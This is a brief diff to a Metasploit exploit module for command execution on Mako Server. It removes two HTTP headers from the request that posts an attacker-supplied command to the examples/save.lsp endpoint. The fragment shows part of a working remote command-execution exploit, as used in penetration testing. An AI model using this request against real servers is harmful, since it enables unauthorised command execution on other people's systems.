diff --git a/modules/exploits/windows/http/makoserver_cmd_exec.rb b/modules/exploits/windows/http/makoserver_cmd_exec.rb index 97cee67e1d..1e3a16bdad 100644 --- a/modules/exploits/windows/http/makoserver_cmd_exec.rb +++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb @@ -102,10 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'examples/save.lsp'), 'ctype' => 'text/plain', 'data' => cmd, - 'headers' => { - 'X-Requested-With' => 'XMLHttpRequest', - 'Referer' => 'http://localhost/Lua-Types.lsp' - }, 'vars_get' => { 'ex' => '2.1' }